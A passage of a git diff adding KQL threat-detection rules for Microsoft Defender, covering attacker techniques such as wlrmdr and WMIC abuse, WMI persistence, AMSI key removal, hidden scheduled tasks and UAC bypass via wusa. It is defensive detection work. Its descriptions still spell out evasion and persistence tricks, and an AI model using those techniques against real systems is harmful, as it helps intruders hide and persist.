"–remote:127.0.0.1" or ProcessCommandLine contains "—remote:127.0.0.1" or ProcessCommandLine contains "―remote:127.0.0.1" or ProcessCommandLine contains "-remote:[::1]" or ProcessCommandLine contains "/remote:[::1]" or ProcessCommandLine contains "–remote:[::1]" or ProcessCommandLine contains "—remote:[::1]" or ProcessCommandLine contains "―remote:[::1]")) or ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (not((ProcessCommandLine contains "-r:" or ProcessCommandLine contains "/r:" or ProcessCommandLine contains "–r:" or ProcessCommandLine contains "—r:" or ProcessCommandLine contains "―r:" or ProcessCommandLine contains "-remote:" or ProcessCommandLine contains "/remote:" or ProcessCommandLine contains "–remote:" or ProcessCommandLine contains "—remote:" or ProcessCommandLine contains "―remote:"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql
new file mode 100644
index 00000000..2b160075
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql
@@ -0,0 +1,11 @@
+// Title: Wlrmdr.EXE Uncommon Argument Or Child Process
+// Author: frack113, manasmbellani
+// Date: 2022-02-16
+// Level: medium
+// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
+// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or (((ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a " or ProcessCommandLine contains "–a " or ProcessCommandLine contains "—a " or ProcessCommandLine contains "―a ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f " or ProcessCommandLine contains "–f " or ProcessCommandLine contains "—f " or ProcessCommandLine contains "―f ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m " or ProcessCommandLine contains "–m " or ProcessCommandLine contains "—m " or ProcessCommandLine contains "―m ") and (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t " or ProcessCommandLine contains "–t " or ProcessCommandLine contains "—t " or ProcessCommandLine contains "―t ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u " or ProcessCommandLine contains "–u " or ProcessCommandLine contains "—u " or ProcessCommandLine contains "―u ") and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql
new file mode 100644
index 00000000..d94dee0b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql
@@ -0,0 +1,10 @@
+// Title: WMI Backdoor Exchange Transport Agent
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-11
+// Level: critical
+// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql b/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql
new file mode 100644
index 00000000..7945b485
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql
@@ -0,0 +1,13 @@
+// Title: WMI Persistence - Script Event Consumer
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: medium
+// Description: Detects WMI script event consumers
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.003
+// False Positives:
+//   - Legitimate event consumers
+//   - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql b/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql
new file mode 100644
index 00000000..4cf2f286
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: WMIC Remote Command Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-14
+// Level: medium
+// Description: Detects the execution of WMIC to query information on a remote system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-node:" or ProcessCommandLine contains "/node:" or ProcessCommandLine contains "–node:" or ProcessCommandLine contains "—node:" or ProcessCommandLine contains "―node:") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "localhost" or ProcessCommandLine contains "127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql b/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql
new file mode 100644
index 00000000..e6735784
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql
@@ -0,0 +1,12 @@
+// Title: WmiPrvSE Spawned A Process
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-15
+// Level: medium
+// Description: Detects WmiPrvSE spawning a process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+// False Positives:
+//   - False positives are expected (e.g. in environments where WinRM is used legitimately)
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql b/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql
new file mode 100644
index 00000000..a65f6e63
--- /dev/null
+++ b/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql
@@ -0,0 +1,11 @@
+// Title: Write Protect For Storage Disabled
+// Author: Sreeman
+// Date: 2021-06-11
+// Level: medium
+// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
+// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql
new file mode 100644
index 00000000..813a859f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql
@@ -0,0 +1,10 @@
+// Title: Writing Of Malicious Files To The Fonts Folder
+// Author: Sreeman
+// Date: 2020-04-21
+// Level: medium
+// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1211, attack.t1059, attack.defense-evasion, attack.persistence, attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql b/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql
new file mode 100644
index 00000000..57b5d581
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Wscript Shell Run In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql b/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql
new file mode 100644
index 00000000..8975570c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql
@@ -0,0 +1,10 @@
+// Title: WSL Child Process Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-23
+// Level: medium
+// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql b/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql
new file mode 100644
index 00000000..9a351895
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql
@@ -0,0 +1,12 @@
+// Title: WSL Kali-Linux Usage
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects the use of Kali Linux through Windows Subsystem for Linux
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+//   - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
+| where (((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\packages\\KaliLinux") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\kali.exe")) or (FolderPath contains ":\\Program Files\\WindowsApps\\KaliLinux." and FolderPath endswith "\\kali.exe")) or ((((FolderPath contains "\\kali.exe" or FolderPath contains "\\KaliLinux") or (ProcessCommandLine contains "Kali.exe" or ProcessCommandLine contains "Kali-linux" or ProcessCommandLine contains "kalilinux")) and (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe")) and (not((ProcessCommandLine contains " -i " or ProcessCommandLine contains " --install " or ProcessCommandLine contains " --unregister "))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
new file mode 100644
index 00000000..e708dda6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
@@ -0,0 +1,11 @@
+// Title: Wusa.EXE Executed By Parent Process Located In Suspicious Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-26
+// Level: high
+// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
+// Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) and (not(ProcessCommandLine contains ".msu"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
new file mode 100644
index 00000000..6204c9b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
@@ -0,0 +1,12 @@
+// Title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-01
+// Level: medium
+// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+//   - Legitimate ".xbap" being executed via "PresentationHost"
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql
new file mode 100644
index 00000000..09ee5359
--- /dev/null
+++ b/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql
@@ -0,0 +1,15 @@
+// Title: XSL Script Execution Via WMIC.EXE
+// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
+// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+//   - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.
+//   - Static format arguments - https://petri.com/command-line-wmi-part-3
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format" or ProcessCommandLine contains "–format" or ProcessCommandLine contains "—format" or ProcessCommandLine contains "―format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql
new file mode 100644
index 00000000..f68ca9a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql
@@ -0,0 +1,13 @@
+// Title: Xwizard.EXE Execution From Non-Default Location
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-09-20
+// Level: high
+// Description: Detects the execution of Xwizard tool from a non-default directory.
+// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Windows installed on non-C drive
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql
new file mode 100644
index 00000000..fdb9d7c1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql
@@ -0,0 +1,17 @@
+// Title: Potential Persistence Via Disk Cleanup Handler - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
+// The disk cleanup manager is part of the operating system. It displays the dialog box […]
+// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Legitimate new entry added by windows
+
+DeviceRegistryEvents
+| where (ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql
new file mode 100644
index 00000000..4aefa0d1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql
@@ -0,0 +1,12 @@
+// Title: Delete Defender Scan ShellEx Context Menu Registry Key
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: medium
+// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely as this weakens defenses and normally would not be done even if using another AV.
+
+DeviceRegistryEvents
+| where RegistryKey contains "shellex\\ContextMenuHandlers\\EPP" and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql
new file mode 100644
index 00000000..bc92427d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql
@@ -0,0 +1,12 @@
+// Title: Folder Removed From Exploit Guard ProtectedFolders List - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate administrators removing applications (should always be investigated)
+
+DeviceRegistryEvents
+| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql
new file mode 100644
index 00000000..ef8733f2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql
@@ -0,0 +1,12 @@
+// Title: Removal Of AMSI Provider Registry Keys
+// Author: frack113
+// Date: 2021-06-07
+// Level: high
+// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}") and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql
new file mode 100644
index 00000000..01d28725
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql
@@ -0,0 +1,10 @@
+// Title: Removal Of Index Value to Hide Schedule Task - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-26
+// Level: medium
+// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql
new file mode 100644
index 00000000..78e93068
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql
@@ -0,0 +1,13 @@
+// Title: Removal of Potential COM Hijacking Registry Keys
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
+// These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\shell\\open\\command" and (not((InitiatingProcessFolderPath endswith "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenWith.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Avira\\Antivirus\\", "C:\\Program Files\\Avira\\Antivirus\\")) and (RegistryKey endswith "\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command" or RegistryKey endswith "\\AntiVir.Keyfile\\shell\\open\\command")) or (InitiatingProcessFolderPath endswith "\\reg.exe" and RegistryKey endswith "\\Discord\\shell\\open\\command") or (InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "C:\\eclipse\\eclipse.exe" and RegistryKey contains "_Classes\\eclipse+") or InitiatingProcessFolderPath contains "\\Microsoft\\EdgeUpdate\\Install" or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or ((InitiatingProcessFolderPath contains "AppData\\Local\\Temp" and InitiatingProcessFolderPath contains "\\setup.exe") or (InitiatingProcessFolderPath contains "\\Temp\\is-" and InitiatingProcessFolderPath contains "\\target.tmp")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or InitiatingProcessFolderPath endswith "\\ninite.exe" or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or (InitiatingProcessFolderPath endswith "\\Spotify.exe" and RegistryKey endswith "\\Spotify\\shell\\open\\command") or (InitiatingProcessFolderPath contains "\\Temp" and InitiatingProcessFolderPath contains "\\TeamViewer") or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey endswith "\\wireshark-capture-file*"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql
new file mode 100644
index 00000000..6896874e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql
@@ -0,0 +1,10 @@
+// Title: Removal Of SD Value to Hide Schedule Task - Registry
+// Author: Sittikorn S
+// Date: 2022-04-15
+// Level: medium
